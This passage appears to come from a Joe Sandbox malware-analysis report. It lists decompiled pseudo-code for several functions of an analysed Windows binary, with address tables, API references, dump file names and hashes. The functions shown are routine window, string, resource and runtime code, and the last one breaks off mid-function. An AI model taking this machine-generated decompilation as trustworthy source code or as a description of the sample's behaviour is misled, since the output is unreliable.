				_t9 = GetDlgItem(_a4, _a8);
				_t16 = GetTopWindow;
				_t17 = _t9;
				if(_t17 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t18 = _t10;
						__eflags = _t18;
						if(_t18 == 0) {
							goto L10;
						}
						_t10 = E0040A467(_t13, _t14, _t15, _t18, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t18, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t17) == 0) {
						L3:
						_push(_t17);
						if(_a12 == 0) {
							return E0040A17C(_t13, _t15, _t19);
						}
						_t10 = E0040A1A3(_t13, _t15, _t16, _t17, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E0040A467(__ebx, _t14, _t15, _t17, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}














                                                                                                                            0x0040a467
                                                                                                                            0x0040a467
                                                                                                                            0x0040a467
                                                                                                                            0x0040a472
                                                                                                                            0x0040a478
                                                                                                                            0x0040a47e
                                                                                                                            0x0040a482
                                                                                                                            0x0040a4b2
                                                                                                                            0x0040a4b5
                                                                                                                            0x0040a4d2
                                                                                                                            0x0040a4d2
                                                                                                                            0x0040a4d4
                                                                                                                            0x0040a4d6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a4c0
                                                                                                                            0x0040a4c5
                                                                                                                            0x0040a4c7
                                                                                                                            0x0040a4cc
                                                                                                                            0x00000000
                                                                                                                            0x0040a4cc
                                                                                                                            0x00000000
                                                                                                                            0x0040a4c7
                                                                                                                            0x0040a484
                                                                                                                            0x0040a489
                                                                                                                            0x0040a49b
                                                                                                                            0x0040a49f
                                                                                                                            0x0040a4a0
                                                                                                                            0x00000000
                                                                                                                            0x0040a4a2
                                                                                                                            0x0040a4a9
                                                                                                                            0x0040a4ae
                                                                                                                            0x0040a4b0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a48b
                                                                                                                            0x0040a492
                                                                                                                            0x0040a499
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040a499
                                                                                                                            0x0040a489
                                                                                                                            0x0040a4db
                                                                                                                            0x0040a4db

                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32 ref: 0040A472
                                                                                                                            • GetTopWindow.USER32(00000000), ref: 0040A485
                                                                                                                              • Part of subcall function 0040A467: GetWindow.USER32(00000000,00000002), ref: 0040A4CC
                                                                                                                            • GetTopWindow.USER32(?), ref: 0040A4B5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Item
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 369458955-0
                                                                                                                            • Opcode ID: a99ec9bdd8663cf9b5f5f4f59f69078edcf8efe3d471758969bcc2dcbadf5f82
                                                                                                                            • Instruction ID: 9de3da22cee3967fe41393aa4cde47b4abc0217aa6be4f0f4c8c96b8572bc699
                                                                                                                            • Opcode Fuzzy Hash: a99ec9bdd8663cf9b5f5f4f59f69078edcf8efe3d471758969bcc2dcbadf5f82
                                                                                                                            • Instruction Fuzzy Hash: 00014F3A001715B7CB226F619C08EAF3A18AF553A5F048136FD0475290D7B9C931AAAF
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00419A7C Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 50%
                                                                                                                            			E00419A7C(short* _a4) {
				char* _v0;
				int _v8;
				int _v16;
				void* __ecx;
				void* __ebp;
				int _t6;
				char* _t7;
				void* _t12;
				char* _t13;
				void* _t15;
				void* _t16;
				short* _t20;

				_t20 = _a4;
				if(_t20 != 0) {
					__imp__#7(_t20, _t16, _t12);
					_v8 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_t13 = _t7;
					if(_t13 == 0) {
						E0040D87C(_t15);
					}
					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
					return _t13;
				}
				return 0;
			}















                                                                                                                            0x00419a7e
                                                                                                                            0x00419a87
                                                                                                                            0x00419a90
                                                                                                                            0x00419aa4
                                                                                                                            0x00419aa8
                                                                                                                            0x00419aac
                                                                                                                            0x00419ab0
                                                                                                                            0x00419ab6
                                                                                                                            0x00419aba
                                                                                                                            0x00419abc
                                                                                                                            0x00419abc
                                                                                                                            0x00419acf
                                                                                                                            0x00000000
                                                                                                                            0x00419ad4
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • SysStringLen.OLEAUT32(?), ref: 00419A90
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,0041AB5C,00000000,00000018,0041AEA2), ref: 00419AA8
                                                                                                                            • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00419AB0
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,0041AB5C,00000000,00000018,0041AEA2), ref: 00419ACF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3384502665-0
                                                                                                                            • Opcode ID: 91e4927e27718b1129e99109cabf6e1dea739283448eb51fdb809c01474afd1e
                                                                                                                            • Instruction ID: 4c39c2c1415d6319d717b82fcf02bfa7be6e92db6e456d9ba78c5402ae8dde70
                                                                                                                            • Opcode Fuzzy Hash: 91e4927e27718b1129e99109cabf6e1dea739283448eb51fdb809c01474afd1e
                                                                                                                            • Instruction Fuzzy Hash: B9F030721062787F97212BA69C4CCEBBF9CFF8A3F5B00452AF54992100D6799944C6F9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00429B15 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00429B15(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00429412(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E004294FE(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00429A1D(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00429964(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}







                                                                                                                            0x00429b15
                                                                                                                            0x00429b18
                                                                                                                            0x00429b1e
                                                                                                                            0x00429b91
                                                                                                                            0x00000000
                                                                                                                            0x00429b25
                                                                                                                            0x00429b25
                                                                                                                            0x00429b28
                                                                                                                            0x00429b43
                                                                                                                            0x00429b46
                                                                                                                            0x00429b66
                                                                                                                            0x00429b78
                                                                                                                            0x00429b48
                                                                                                                            0x00429b48
                                                                                                                            0x00429b4b
                                                                                                                            0x00000000
                                                                                                                            0x00429b4d
                                                                                                                            0x00429b5f
                                                                                                                            0x00429b5f
                                                                                                                            0x00429b4b
                                                                                                                            0x00429b96
                                                                                                                            0x00429b9a
                                                                                                                            0x00429b2a
                                                                                                                            0x00429b42
                                                                                                                            0x00429b42
                                                                                                                            0x00429b28

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                            • Instruction ID: 400fba0347e17f0144c928c508734864868915bd9cf63124eb0e56d40738a704
                                                                                                                            • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                            • Instruction Fuzzy Hash: 4B01833250015AFBCF125E95EC01CEE3F26BB18354F88851AFA1855131C23AD9B1AB89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00427747 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 89%
                                                                                                                            			E00427747(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x43d3e0);
				E0042066C(__ebx, __edi, __esi);
				_t31 = E0042232C(__ebx, _t35);
				_t15 =  *0x441e04; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00422A33(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x441d08; // 0x2351340
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x4418e0;
								if(__eflags != 0) {
									_push(_t33);
									E0041D8F1(_t25, _t29, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x441d08; // 0x2351340
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x441d08; // 0x2351340
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E004277E2();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0041E063(_t29, 0x20);
				}
				return E004206B1(_t33);
			}











                                                                                                                            0x00427747
                                                                                                                            0x00427747
                                                                                                                            0x00427747
                                                                                                                            0x00427747
                                                                                                                            0x00427749
                                                                                                                            0x0042774e
                                                                                                                            0x00427758
                                                                                                                            0x0042775a
                                                                                                                            0x00427762
                                                                                                                            0x00427783
                                                                                                                            0x00427789
                                                                                                                            0x0042778d
                                                                                                                            0x00427790
                                                                                                                            0x00427793
                                                                                                                            0x00427799
                                                                                                                            0x0042779b
                                                                                                                            0x0042779d
                                                                                                                            0x004277a0
                                                                                                                            0x004277a6
                                                                                                                            0x004277a8
                                                                                                                            0x004277aa
                                                                                                                            0x004277b0
                                                                                                                            0x004277b2
                                                                                                                            0x004277b3
                                                                                                                            0x004277b8
                                                                                                                            0x004277b0
                                                                                                                            0x004277a8
                                                                                                                            0x004277b9
                                                                                                                            0x004277be
                                                                                                                            0x004277c1
                                                                                                                            0x004277c7
                                                                                                                            0x004277cb
                                                                                                                            0x004277cb
                                                                                                                            0x004277d1
                                                                                                                            0x004277d8
                                                                                                                            0x0042776a
                                                                                                                            0x0042776a
                                                                                                                            0x0042776a
                                                                                                                            0x0042776f
                                                                                                                            0x00427773
                                                                                                                            0x00427778
                                                                                                                            0x00427780

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0042232C: __getptd_noexit.LIBCMT ref: 0042232D
                                                                                                                              • Part of subcall function 0042232C: __amsg_exit.LIBCMT ref: 0042233A
                                                                                                                            • __amsg_exit.LIBCMT ref: 00427773
                                                                                                                            • __lock.LIBCMT ref: 00427783
                                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 004277A0
                                                                                                                            • InterlockedIncrement.KERNEL32(02351340), ref: 004277CB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2880340415-0
                                                                                                                            • Opcode ID: 9c1ba5cef1ffedb7c8b67d88022fc3a8117d0048202020c6dfc77f6d16d03053
                                                                                                                            • Instruction ID: 9de0488e0c5715cb0262513952a8ec74af1d963d1f1e21b15f6a5086050f9f1c
                                                                                                                            • Opcode Fuzzy Hash: 9c1ba5cef1ffedb7c8b67d88022fc3a8117d0048202020c6dfc77f6d16d03053
                                                                                                                            • Instruction Fuzzy Hash: 7001A175F04631A7C721AB66B84575A7760AF84715F90012BE810A7291CB2C7D81DBDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040CD59 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040CD59(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E0040C910(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E0040706D(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}















                                                                                                                            0x0040cd5d
                                                                                                                            0x0040cd5f
                                                                                                                            0x0040cd61
                                                                                                                            0x0040cd65
                                                                                                                            0x0040cd67
                                                                                                                            0x0040cd9c
                                                                                                                            0x0040cda6
                                                                                                                            0x0040cda8
                                                                                                                            0x0040cdaf
                                                                                                                            0x0040cdaf
                                                                                                                            0x00000000
                                                                                                                            0x0040cdb5
                                                                                                                            0x0040cd6e
                                                                                                                            0x0040cd7b
                                                                                                                            0x0040cd83
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040cd87
                                                                                                                            0x0040cd8d
                                                                                                                            0x0040cd91
                                                                                                                            0x0040cd9a
                                                                                                                            0x00000000
                                                                                                                            0x0040cd9a
                                                                                                                            0x0040cdbb

                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 0040CD7B
                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,?,?,00404C08,?,?,004011B9), ref: 0040CD87
                                                                                                                            • LockResource.KERNEL32(00000000,?,?,?,?,00404C08,?,?,004011B9), ref: 0040CD94
                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,00404C08,?,?,004011B9), ref: 0040CDAF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1078018258-0
                                                                                                                            • Opcode ID: 3451cba292707dd0843e5c4f32ecca29564a7efca4a8dd002d52b10f134e19a0
                                                                                                                            • Instruction ID: 7c95292c75888a5a976613e4694319276dd8ee6284c9fd025110f80b03f68f7b
                                                                                                                            • Opcode Fuzzy Hash: 3451cba292707dd0843e5c4f32ecca29564a7efca4a8dd002d52b10f134e19a0
                                                                                                                            • Instruction Fuzzy Hash: B2F0903A301311ABD3111F6A5C8897BBAACEFC5762B05027AFD04E2391EF798D058679
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040509B Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040509B() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E0040CF5B(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E00404AAE(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E0041EA59(_t16);
			}








                                                                                                                            0x0040509b
                                                                                                                            0x0040509e
                                                                                                                            0x004050a6
                                                                                                                            0x004050ac
                                                                                                                            0x004050ac
                                                                                                                            0x004050b4
                                                                                                                            0x004050bb
                                                                                                                            0x004050bb
                                                                                                                            0x004050c4
                                                                                                                            0x004050c6
                                                                                                                            0x004050cc
                                                                                                                            0x004050cf
                                                                                                                            0x004050d4
                                                                                                                            0x004050d4
                                                                                                                            0x004050cf
                                                                                                                            0x004050de
                                                                                                                            0x004050e3
                                                                                                                            0x004050eb
                                                                                                                            0x004050f0
                                                                                                                            0x004050f0
                                                                                                                            0x004050f6
                                                                                                                            0x004050fe

                                                                                                                            APIs
                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 004050BB
                                                                                                                            • GetActiveWindow.USER32 ref: 004050C6
                                                                                                                            • SetActiveWindow.USER32(?,?,00000024,004010BD), ref: 004050D4
                                                                                                                            • FreeResource.KERNEL32(?,?,00000024,004010BD), ref: 004050F0
                                                                                                                              • Part of subcall function 0040CF5B: EnableWindow.USER32(?,?), ref: 0040CF68
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveEnable$FreeResource
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 253586258-0
                                                                                                                            • Opcode ID: 20648bc7478ac4b5a2cc31694bd9311e9fbed2265a4356877e042990eaf5e6db
                                                                                                                            • Instruction ID: 725eed0e42cae68ad1d8a6c540feec633ccf2b63c28ebe34b46bfb126cbb21a8
                                                                                                                            • Opcode Fuzzy Hash: 20648bc7478ac4b5a2cc31694bd9311e9fbed2265a4356877e042990eaf5e6db
                                                                                                                            • Instruction Fuzzy Hash: 9EF04430A00A04CBCF22AF54C8855AFB7B1FF48702F20013AE542722E1CB3A5D80CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041BEFA Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E0041BEFA(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t12;

				_t13 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x4446d8;
					if( *0x4446d8 == 0) {
						_t5 = GetTickCount();
						 *0x4446d8 =  *0x4446d8 + 1;
						__eflags =  *0x4446d8;
						 *0x44121c = _t5;
					}
					_t4 = GetTickCount() -  *0x44121c;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x44121c = _t4;
					}
					return _t4;
				}
				return E0041BEA3(_t7, _t8, _t12, _t13, _a8);
			}








                                                                                                                            0x0041befa
                                                                                                                            0x0041beff
                                                                                                                            0x0041bf0c
                                                                                                                            0x0041bf1a
                                                                                                                            0x0041bf1c
                                                                                                                            0x0041bf1e
                                                                                                                            0x0041bf1e
                                                                                                                            0x0041bf24
                                                                                                                            0x0041bf24
                                                                                                                            0x0041bf2b
                                                                                                                            0x0041bf31
                                                                                                                            0x0041bf36
                                                                                                                            0x0041bf38
                                                                                                                            0x0041bf3e
                                                                                                                            0x0041bf40
                                                                                                                            0x0041bf40
                                                                                                                            0x00000000
                                                                                                                            0x0041bf45
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041BF1C
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041BF29
                                                                                                                            • CoFreeUnusedLibraries.OLE32 ref: 0041BF38
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041BF3E
                                                                                                                              • Part of subcall function 0041BEA3: CoFreeUnusedLibraries.OLE32(00000000,0041BF82,00000000), ref: 0041BEE7
                                                                                                                              • Part of subcall function 0041BEA3: OleUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0041BF82), ref: 0041BEED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 685759847-0
                                                                                                                            • Opcode ID: 4de9ad993a4d094fee613659864ae59eab2f543cf8b86a144026e92011e00402
                                                                                                                            • Instruction ID: c4c35d45ddd92fb2b83c422e2c4df233b84d1c78cfc38513f2d74dc3cf9f0c86
                                                                                                                            • Opcode Fuzzy Hash: 4de9ad993a4d094fee613659864ae59eab2f543cf8b86a144026e92011e00402
                                                                                                                            • Instruction Fuzzy Hash: E4E0ED38805214DBC710EF64EC483993BA4FB42312F1584B7D054D2170C77899D2CF9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00414806 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 88%
                                                                                                                            			E00414806(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t172 = __edx;
				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E00402521( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
